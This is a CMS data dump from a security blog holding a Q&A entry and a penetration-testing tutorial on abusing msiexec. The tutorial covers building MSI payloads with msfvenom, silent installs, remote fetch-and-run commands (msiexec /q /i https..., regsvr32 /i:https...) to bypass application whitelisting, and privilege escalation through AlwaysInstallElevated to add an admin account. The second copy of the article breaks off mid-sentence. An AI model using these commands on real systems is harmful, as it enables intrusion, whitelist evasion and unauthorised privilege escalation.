[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ftIkWw2CelpVAcPWqIawvTPxqk8OoIMv_JavBPA5oz8s":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},1039,"Can msiexec download and execute an MSI file from a remote server?","Yes, msiexec supports remote installation by specifying a URL in the `\u002Fi` parameter, e.g., `msiexec \u002Fq \u002Fi https:\u002F\u002Fexample.com\u002Fpayload.msi`. This technique bypasses application whitelisting and is similar to how regsvr32 remotely executes SCT files. For phishing, attackers may combine this with OLE objects in Office documents, as described in the research on [Penetration Techniques - Parameter Hiding Techniques in Shortcut Files](\u002Fnews\u002Fpenetration-techniques-parameter-hiding-techniques-in-shortcut-files).","\u003Cp>Yes, msiexec supports remote installation by specifying a URL in the `\u002Fi` parameter, e.g., `msiexec \u002Fq \u002Fi https:\u002F\u002Fexample.com\u002Fpayload.msi`. This technique bypasses application whitelisting and is similar to how regsvr32 remotely executes SCT files. For phishing, attackers may combine this with OLE objects in Office documents, as described in the research on [Penetration Techniques - Parameter Hiding Techniques in Shortcut Files](\u002Fnews\u002Fpenetration-techniques-parameter-hiding-techniques-in-shortcut-files).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fmsiexec-in-penetration-testing\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","can-msiexec-download-and-execute-an-msi-file-from-a-remote-server-1777480752706","remote execution, msiexec, application whitelist bypass, phishing, OLE",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},254,"msiexec in Penetration Testing","msiexec-in-penetration-testing","Explore msiexec exploitation in penetration testing, including creating malicious MSI files with Metasploit and Advanced Installer for payload delivery and command execution.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous study on ClickOnce penetration techniques, we encountered the concept of installation packages. Another common type of installation package is the msi file, which can be installed via msiexec in the command line. Therefore, this time we will explore the exploitation techniques of msiexec in penetration testing.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>msiexec:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>A system process, part of Windows Installer\u003C\u002Fp>\u003Cp>Used to install Windows Installer packages (MSI)\u003C\u002Fp>\u003Cp>Typically appears when running Microsoft Update to install updates or installing certain software, consuming relatively high memory\u003C\u002Fp>\u003Cp>Built into the system, used in the command line. Parameter descriptions are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002FOption \u003Crequired parameter=\"\"> [Optional Parameter]\u003Cbr>\u003Cbr>Install Options\u003Cbr>\t \u003Cproduct.msi>\u003Cbr>\t\tInstalls or configures a product\u003Cbr>\t\u002Fa \u003Cproduct.msi>\u003Cbr>\t\tAdministrative install - Installs a product on the network\u003Cbr>\t\u002Fj\u003Cu|m> \u003Cproduct.msi> [\u002Ft \u003Ctransform list=\"\">] [\u002Fg \u003Clanguage id=\"\">]\u003Cbr>\t\tAdvertises a product - m to all users, u to current user\u003Cbr>\t \u003Cproduct.msi |=\"\" productcode=\"\">\u003Cbr>\t\tUninstalls the product\u003Cbr>Display Options\u003Cbr>\t\u002Fquiet\u003Cbr>\t\tQuiet mode, no user interaction\u003Cbr>\t\u002Fpassive\u003Cbr>\t\tUnattended mode - progress bar only\u003Cbr>\t\u002Fq[n|b|r|f]\u003Cbr>\t\tSets user interface level\u003Cbr>\t\tn - No UI\u003Cbr>\t\tb - Basic UI\u003Cbr>\t\tr - Reduced UI\u003Cbr>\t\tf - Full UI (default)\u003Cbr>\t\u002Fhelp\u003Cbr>\t\tHelp information\u003Cbr>Restart Options\u003Cbr>\t\u002Fnorestart\u003Cbr>\t\tDo not restart after the installation is complete\u003Cbr>\t\u002Fpromptrestart\u003Cbr>\t\tPrompts the user for restart if necessary\u003Cbr>\t\u002Fforcerestart\u003Cbr>\t\tAlways restart the computer after installation\u003Cbr>Logging Options\u003Cbr>\t\u002Fl[i|w|e|a|r|u|c|m|o|p|v|x|+|!|*] \u003Clogfile>\u003Cbr>\t\ti - Status messages\u003Cbr>\t\tw - Nonfatal warnings\u003Cbr>\t\te - All error messages\u003Cbr>\t\ta - Start up of actions\u003Cbr>\t\tr - Action-specific records\u003Cbr>\t\tu - User requests\u003Cbr>\t\tc - Initial UI parameters\u003Cbr>\t\tm - Out-of-memory or fatal exit information\u003Cbr>\t\to - Out-of-disk-space messages\u003Cbr>\t\tp - Terminal properties\u003Cbr>\t\tv - Verbose output\u003Cbr>\t\tx - Extra debugging information\u003Cbr>\t\t+ - Append to existing log file\u003Cbr>\t\t! - Flush each line to the log\u003Cbr>\t\t* - Log all information, except for v and x options\u003Cbr>\t\u002Flog \u003Clogfile>\u003Cbr>\t\tEquivalent of \u002Fl* \u003Clogfile>\u003Cbr>Update Options\u003Cbr>\t\u002Fupdate \u003Cupdate1.msp>[;Update2.msp]\u003Cbr>\t\tApplies update(s)\u003Cbr>\t\u002Funinstall \u003Cpatchcodeguid>[;Update2.msp] \u002Fpackage \u003Cproduct.msi |=\"\" productcode=\"\">\u003Cbr>\t\tRemove update(s) for a product\u003Cbr>Repair Options\u003Cbr>\t\u002Ff[p|e|c|m|s|o|d|a|u|v] \u003Cproduct.msi |=\"\" productcode=\"\">\u003Cbr>\t\tRepairs a product\u003Cbr>\t\tp - only if file is missing\u003Cbr>\t\to - if file is missing or an older version is installed (default)\u003Cbr>\t\te - if file is missing or an equal or older version is installed\u003Cbr>\t\td - if file is missing or a different version is installed\u003Cbr>\t\tc - if file is missing or checksum does not match the calculated value\u003Cbr>\t\ta - forces all files to be reinstalled\u003Cbr>\t\tu - all required user-specific registry entries (default)\u003Cbr>\t\tm - all required computer-specific registry entries (default)\u003Cbr>\t\ts - all existing shortcuts (default)\u003Cbr>\t\tv - runs from source and recaches local package\u003Cbr>Setting Public Properties\u003Cbr>\t[PROPERTY=PropertyValue]\u003C\u002Fproduct.msi>\u003C\u002Fproduct.msi>\u003C\u002Fpatchcodeguid>\u003C\u002Fupdate1.msp>\u003C\u002Flogfile>\u003C\u002Flogfile>\u003C\u002Flogfile>\u003C\u002Fproduct.msi>\u003C\u002Flanguage>\u003C\u002Ftransform>\u003C\u002Fproduct.msi>\u003C\u002Fu|m>\u003C\u002Fproduct.msi>\u003C\u002Fproduct.msi>\u003C\u002Frequired>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x02 Creating .msi files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Using Metasploit\u003C\u002Fh3>\u003Cp>The msf command is as follows:\u003C\u002Fp>\u003Cp>msfvenom -f msi -p windows\u002Fexec CMD=calc.exe&gt;test.msi\u003C\u002Fp>\u003Cp>After execution, test.msi is generated\u003C\u002Fp>\u003Cp>Double-click to install directly, as shown in the figure, calculator pops up\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015144568_0_5ce30dbe65.png\">\u003C\u002Fp>\u003Cp>Equivalent to executing the following command in the command line:\u003C\u002Fp>\u003Cp>msiexec \u002Fi test.msi\u003C\u002Fp>\u003Cp>As shown in the figure below, an installation dialog will also pop up; the \u002Fq parameter can be used to hide the installation interface.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015147458_1_8cc8237caf.png\">\u003C\u002Fp>\u003Cp>The command-line parameters are as follows:\u003C\u002Fp>\u003Cp>msiexec \u002Fq \u002Fi test.msi\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015149321_2_1da3f26e33.png\">\u003C\u002Fp>\u003Cp>After execution, an MSI log file will be generated under %TEMP%, as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015150629_3_e19ad87620.png\">\u003C\u002Fp>\u003Cp>To make the payload extensible, MSF generates the MSI file as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Create an MSI file template.\u003C\u002Fli>\u003Cli>Reserve a fixed location in the file to store the payload.\u003C\u002Fli>\u003Cli>Read and execute the content at this address during runtime.\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For details, refer to the following link:\u003C\u002Fp>\u003Cp>http:\u002F\u002Frewtdance.blogspot.co.uk\u002F2013\u002F03\u002Fmetasploit-msi-payload-generation.html\u003C\u002Fp>\u003Cp>For information on the MSI file format, refer to:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.forensicswiki.org\u002Fw\u002Fimages\u002F5\u002F5b\u002FCompdocfileformat.pdf\u003C\u002Fp>\u003Ch3>2. Using Advanced Installer\u003C\u002Fh3>\u003Cp>Advanced Installer is a powerful tool for creating MSI installation packages that comply with MS Windows certification. It features a user-friendly graphical interface that is intuitive and very simple to use, making it an excellent tool for writing Windows Installers.\u003C\u002Fp>\u003Cp>The interface is shown in the figure below, with a user-friendly configuration interface.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015152383_4_58e9292b88.png\">\u003C\u002Fp>\u003Cp>Select custom actions in the custom behavior section and add LaunchFile.\u003C\u002Fp>\u003Cp>Set parameters such as the startup file, as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015154952_5_baaa79d9d4.png\">\u003C\u002Fp>\u003Cp>Export the MSI file, as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015156679_6_085349beff.jpeg\">\u003C\u002Fp>\u003Cp>The generated file is shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015157357_7_78f0146071.png\">\u003C\u002Fp>\u003Cp>The command-line parameters are as follows:\u003C\u002Fp>\u003Cp>msiexec \u002Fq \u002Fi test2.msi\u003C\u002Fp>\u003Cp>Successfully launches cmd.exe, as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015158091_8_d229ae978e.png\">\u003C\u002Fp>\u003Cp>It is worth noting that the path of the popped-up cmd is c:\\windows\\installer\\MSI3646.tmp\u003C\u002Fp>\u003Cp>View the path c:\\windows\\installer\\, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015158535_9_48f4ec7fb8.jpeg\">\u003C\u002Fp>\u003Cp>The sizes of 6260236.msi and test2.msi are the same (it is actually the test2.msi file)\u003C\u002Fp>\u003Cp>Now close the popped-up cmd and view the path c:\\windows\\installer\\ again, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015158823_10_4117b663c6.jpeg\">\u003C\u002Fp>\u003Cp>After the installation is completed, the installation files are deleted, leaving only the .tmp file to record the installation operation. The content is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015159069_11_8a05412e7f.png\">\u003C\u002Fp>\u003Cp>Of course, MSI log files will also be generated under %TEMP%\u003C\u002Fp>\u003Ch2>0x03 Remote Download and Execution of MSI Files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Previously, in the article 'Use SCT to Bypass Application Whitelisting Protection', the application techniques of regsvr32 were studied, which can remotely execute SCT files on the server from the command line\u003C\u002Fp>\u003Cp>Command line example:\u003C\u002Fp>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct scrobj.dll\u003C\u002Fp>\u003Cp>msiexec also supports this feature\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The following link describes a method for remote execution combined with shortcuts, inserted into Excel documents via OLE objects for phishing attacks:\u003C\u002Fp>\u003Cp>https:\u002F\u002Flabs.nettitude.com\u002Fblog\u002Ffun-with-windows-binaries-application-whitelist-bypass-using-msiexec\u002F\u003C\u002Fp>\u003Cp>Upload the MSI file to the server and execute it remotely with the following command:\u003C\u002Fp>\u003Cp>msiexec \u002Fq \u002Fi https:\u002F\u002Fraw.githubusercontent.some-open-source-project.png\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Since it is an MSI file generated by MSF, it will be blocked by antivirus software by default, but the operation is just a calculator pop-up\u003C\u002Fp>\u003Cp>Upload your own developed MSI file to the server and execute it remotely with the following command:\u003C\u002Fp>\u003Cp>msiexec \u002Fq \u002Fi https:\u002F\u002Fraw.githubusercontent.some-open-source-project.msi\u003C\u002Fp>\u003Cp>Successfully executed the MSI file, cmd.exe popped up\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015159744_12_23b8d4ff27.png\">\u003C\u002Fp>\u003Ch2>0x04 Privilege Escalation\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Privilege escalation can be achieved using Group Policy\u003C\u002Fp>\u003Cp>Enable the AlwaysInstallElevated privileged installation feature:\u003C\u002Fp>\u003Cul>\u003Cli>Open Group Policy Editor\u003C\u002Fli>\u003Cli>User Configuration - Administrative Templates - Windows Components - Windows Installer - Always install with elevated privileges:\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Select Enable\u003C\u002Fp>\u003Cul>\u003Cli>Computer Configuration - Administrative Templates - Windows Components - Windows Installer - Always install with elevated privileges:\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Select Enable\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015160214_13_2f381018b6.png\">\u003C\u002Fp>\u003Cp>At this point, registry key values will be automatically created at the following locations:\u003C\u002Fp>\u003Cp>`[HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Installer]\u003C\u002Fp>\u003Cp>\"AlwaysInstallElevated\"=dword:00000001`\u003C\u002Fp>\u003Cp>`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer]\u003C\u002Fp>\u003Cp>\"AlwaysInstallElevated\"=dword:00000001`\u003C\u002Fp>\u003Cp>Next, use PowerUp to complete the privilege escalation and add user operation\u003C\u002Fp>\u003Cp>PowerUp address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FPrivesc\u002FPowerUp.ps1\u003C\u002Fp>\u003Cp>Check if AlwaysInstallElevated is enabled:\u003C\u002Fp>\u003Cp>Get-RegistryAlwaysInstallElevated\u003C\u002Fp>\u003Cp>Returns true if the system has AlwaysInstallElevated enabled\u003C\u002Fp>\u003Cp>Exploiting AlwaysInstallElevated to add a user:\u003C\u002Fp>\u003Cp>Write-UserAddMSI\u003C\u002Fp>\u003Cp>After execution, generates the file UserAdd.msi\u003C\u002Fp>\u003Cp>Then run this UserAdd.msi with standard user privileges to successfully add an account\u003C\u002Fp>\u003Cp>Complete test as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770015161212_14_6f860d0752.jpeg\">\u003C\u002Fp>\u003Cp>Successfully adds an administrator account under a standard-privilege cmd\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If registry access is obtained, AlwaysInstallElevated can be enabled by modifying the registry (both registry key values must be changed), thereby escalating privileges, or even used as a post-exploitation backdoor\u003C\u002Fp>\u003Cp>Check if AlwaysInstallElevated is enabled:\u003C\u002Fp>\u003Cp>Just check the registry, the cmd commands are as follows:\u003C\u002Fp>\u003Cp>reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated\u003C\u002Fp>\u003Cp>reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated\u003C\u002Fp>\u003Cp>A value of 1 for all indicates AlwaysInstallElevated is enabled; otherwise, it is not enabled.\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Through msiexec, not only can remote code download and execution be achieved via the command line, but it can also be applied for privilege escalation. More exploitation methods are worth researching.\u003C\u002Fp>\u003Cp>Of course, for defense against these exploitation methods, simply disabling AlwaysInstallElevated can prevent privilege escalation via msi files.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous study on ClickOnce penetration techniques, we encountered the concept of installation packages. Another common type of installation package is the msi file, which can be installed via msiexec in the command line. Therefore, this time we will explore the exploitation techniques of msiexec in penetration testing.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>msiexec:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>A system process, part of Windows Installer\u003C\u002Fp>\u003Cp>Used to install Windows Installer packages (MSI)\u003C\u002Fp>\u003Cp>Typically appears when running Microsoft Update to install updates or installing certain software, consuming relatively high memory\u003C\u002Fp>\u003Cp>Built into the system, used in the command line. Parameter descriptions are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msiexec \u002FOption \u003Crequired parameter=\"\"> [Optional Parameter]\u003Cbr>\u003Cbr>Install Options\u003Cbr>\t \u003Cproduct.msi>\u003Cbr>\t\tInstalls or configures a product\u003Cbr>\t\u002Fa \u003Cproduct.msi>\u003Cbr>\t\tAdministrative install - Installs a product on the network\u003Cbr>\t\u002Fj\u003Cu|m> \u003Cproduct.msi> [\u002Ft \u003Ctransform list=\"\">] [\u002Fg \u003Clanguage id=\"\">]\u003Cbr>\t\tAdvertises a product - m to all users, u to current user\u003Cbr>\t \u003Cproduct.msi |=\"\" productcode=\"\">\u003Cbr>\t\tUninstalls the product\u003Cbr>Display Options\u003Cbr>\t\u002Fquiet\u003Cbr>\t\tQuiet mode, no user interaction\u003Cbr>\t\u002Fpassive\u003Cbr>\t\tUnattended mode - progress bar only\u003Cbr>\t\u002Fq[n|b|r|f]\u003Cbr>\t\tSets user interface level\u003Cbr>\t\tn - No UI\u003Cbr>\t\tb - Basic UI\u003Cbr>\t\tr - Reduced UI\u003Cbr>\t\tf - Full UI (default)\u003Cbr>\t\u002Fhelp\u003Cbr>\t\tHelp information\u003Cbr>Restart Options\u003Cbr>\t\u002Fnorestart\u003Cbr>\t\tDo not restart after the installation is complete\u003Cbr>\t\u002Fpromptrestart\u003Cbr>\t\tPrompts the user for restart if necessary\u003Cbr>\t\u002Fforcerestart\u003Cbr>\t\tAlways restart the computer after installation\u003Cbr>Logging Options\u003Cbr>\t\u002Fl[i|w|e|a|r|u|c|m|o|p|v|x|+|!|*] \u003Clogfile>\u003Cbr>\t\ti - Status messages\u003Cbr>\t\tw - Nonfatal warnings\u003Cbr>\t\te - All error messages\u003Cbr>\t\ta - Start up of actions\u003Cbr>\t\tr - Action-specific records\u003Cbr>\t\tu - User requests\u003Cbr>\t\tc - Initial UI parameters\u003Cbr>\t\tm - Out-of-memory or fatal exit information\u003Cbr>\t\to - Out-of-disk-space messages\u003Cbr>\t\tp - Terminal properties\u003Cbr>\t\tv - Verbose output\u003Cbr>\t\tx - Extra debugging information\u003Cbr>\t\t+ - Append to existing log file\u003Cbr>\t\t! - Flush each line to the log\u003Cbr>\t\t* - Log all information, except for v and x options\u003Cbr>\t\u002Flog \u003Clogfile>\u003Cbr>\t\tEquivalent of \u002Fl* \u003Clogfile>\u003Cbr>Update Options\u003Cbr>\t\u002Fupdate \u003Cupdate1.msp>[;Update2.msp]\u003Cbr>\t\tApplies update(s)\u003Cbr>\t\u002Funinstall \u003Cpatchcodeguid>[;Update2.msp] \u002Fpackage \u003Cproduct.msi |=\"\" productcode=\"\">\u003Cbr>\t\tRemove update(s) for a product\u003Cbr>Repair Options\u003Cbr>\t\u002Ff[p|e|c|m|s|o|d|a|u|v] \u003Cproduct.msi |=\"\" productcode=\"\">\u003Cbr>\t\tRepairs a product\u003Cbr>\t\tp - only if file is missing\u003Cbr>\t\to - if file is missing or an older version is installed (default)\u003Cbr>\t\te - if file is missing or an equal or older version is installed\u003Cbr>\t\td - if file is missing or a different version is installed\u003Cbr>\t\tc - if file is missing or checksum does not match the calculated value\u003Cbr>\t\ta - forces all files to be reinstalled\u003Cbr>\t\tu - all required user-specific registry entries (default)\u003Cbr>\t\tm - all required computer-specific registry entries (default)\u003Cbr>\t\ts - all existing shortcuts (default)\u003Cbr>\t\tv - runs from source and recaches local package\u003Cbr>Setting Public Properties\u003Cbr>\t[PROPERTY=PropertyValue]\u003C\u002Fproduct.msi>\u003C\u002Fproduct.msi>\u003C\u002Fpatchcodeguid>\u003C\u002Fupdate1.msp>\u003C\u002Flogfile>\u003C\u002Flogfile>\u003C\u002Flogfile>\u003C\u002Fproduct.msi>\u003C\u002Flanguage>\u003C\u002Ftransform>\u003C\u002Fproduct.msi>\u003C\u002Fu|m>\u003C\u002Fproduct.msi>\u003C\u002Fproduct.msi>\u003C\u002Frequired>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x02 Creating .msi files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Using Metasploit\u003C\u002Fh3>\u003Cp>The msf command is as follows:\u003C\u002Fp>\u003Cp>msfvenom -f msi -p windows\u002Fexec CMD=calc.exe&gt;test.msi\u003C\u002Fp>\u003Cp>After execution, test.msi is generated\u003C\u002Fp>\u003Cp>Double-click to install directly, as shown in the figure, calculator pops up\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015144568_0_5ce30dbe65-1.png\">\u003C\u002Fp>\u003Cp>Equivalent to executing the following command in the command line:\u003C\u002Fp>\u003Cp>msiexec \u002Fi test.msi\u003C\u002Fp>\u003Cp>As shown in the figure below, an installation dialog will also pop up; the \u002Fq parameter can be used to hide the installation interface.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015147458_1_8cc8237caf-1.png\">\u003C\u002Fp>\u003Cp>The command-line parameters are as follows:\u003C\u002Fp>\u003Cp>msiexec \u002Fq \u002Fi test.msi\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015149321_2_1da3f26e33-1.png\">\u003C\u002Fp>\u003Cp>After execution, an MSI log file will be generated under %TEMP%, as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015150629_3_e19ad87620-1.png\">\u003C\u002Fp>\u003Cp>To make the payload extensible, MSF generates the MSI file as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Create an MSI file template.\u003C\u002Fli>\u003Cli>Reserve a fixed location in the file to store the payload.\u003C\u002Fli>\u003Cli>Read and execute the content at this address during runtime.\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For details, refer to the following link:\u003C\u002Fp>\u003Cp>http:\u002F\u002Frewtdance.blogspot.co.uk\u002F2013\u002F03\u002Fmetasploit-msi-payload-generation.html\u003C\u002Fp>\u003Cp>For information on the MSI file format, refer to:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.forensicswiki.org\u002Fw\u002Fimages\u002F5\u002F5b\u002FCompdocfileformat.pdf\u003C\u002Fp>\u003Ch3>2. Using Advanced Installer\u003C\u002Fh3>\u003Cp>Advanced Installer is a powerful tool for creating MSI installation packages that comply with MS Windows certification. It features a user-friendly graphical interface that is intuitive and very simple to use, making it an excellent tool for writing Windows Installers.\u003C\u002Fp>\u003Cp>The interface is shown in the figure below, with a user-friendly configuration interface.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015152383_4_58e9292b88-1.png\">\u003C\u002Fp>\u003Cp>Select custom actions in the custom behavior section and add LaunchFile.\u003C\u002Fp>\u003Cp>Set parameters such as the startup file, as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015154952_5_baaa79d9d4-1.png\">\u003C\u002Fp>\u003Cp>Export the MSI file, as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015156679_6_085349beff-1.jpeg\">\u003C\u002Fp>\u003Cp>The generated file is shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015157357_7_78f0146071-1.png\">\u003C\u002Fp>\u003Cp>The command-line parameters are as follows:\u003C\u002Fp>\u003Cp>msiexec \u002Fq \u002Fi test2.msi\u003C\u002Fp>\u003Cp>Successfully launches cmd.exe, as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015158091_8_d229ae978e-1.png\">\u003C\u002Fp>\u003Cp>It is worth noting that the path of the popped-up cmd is c:\\windows\\installer\\MSI3646.tmp\u003C\u002Fp>\u003Cp>View the path c:\\windows\\installer\\, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015158535_9_48f4ec7fb8-1.jpeg\">\u003C\u002Fp>\u003Cp>The sizes of 6260236.msi and test2.msi are the same (it is actually the test2.msi file)\u003C\u002Fp>\u003Cp>Now close the popped-up cmd and view the path c:\\windows\\installer\\ again, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015158823_10_4117b663c6-1.jpeg\">\u003C\u002Fp>\u003Cp>After the installation is completed, the installation files are deleted, leaving only the .tmp file to record the installation operation. The content is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015159069_11_8a05412e7f-1.png\">\u003C\u002Fp>\u003Cp>Of course, MSI log files will also be generated under %TEMP%\u003C\u002Fp>\u003Ch2>0x03 Remote Download and Execution of MSI Files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Previously, in the article 'Use SCT to Bypass Application Whitelisting Protection', the application techniques of regsvr32 were studied, which can remotely execute SCT files on the server from the command line\u003C\u002Fp>\u003Cp>Command line example:\u003C\u002Fp>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct scrobj.dll\u003C\u002Fp>\u003Cp>msiexec also supports this feature\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The following link describes a method for remote execution combined with shortcuts, inserted into Excel documents via OLE objects for phishing attacks:\u003C\u002Fp>\u003Cp>https:\u002F\u002Flabs.nettitude.com\u002Fblog\u002Ffun-with-windows-binaries-application-whitelist-bypass-using-msiexec\u002F\u003C\u002Fp>\u003Cp>Upload the MSI file to the server and execute it remotely with the following command:\u003C\u002Fp>\u003Cp>msiexec \u002Fq \u002Fi https:\u002F\u002Fraw.githubusercontent.some-open-source-project.png\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Since it is an MSI file generated by MSF, it will be blocked by antivirus software by default, but the operation is just a calculator pop-up\u003C\u002Fp>\u003Cp>Upload your own developed MSI file to the server and execute it remotely with the following command:\u003C\u002Fp>\u003Cp>msiexec \u002Fq \u002Fi https:\u002F\u002Fraw.githubusercontent.some-open-source-project.msi\u003C\u002Fp>\u003Cp>Successfully executed the MSI file, cmd.exe popped 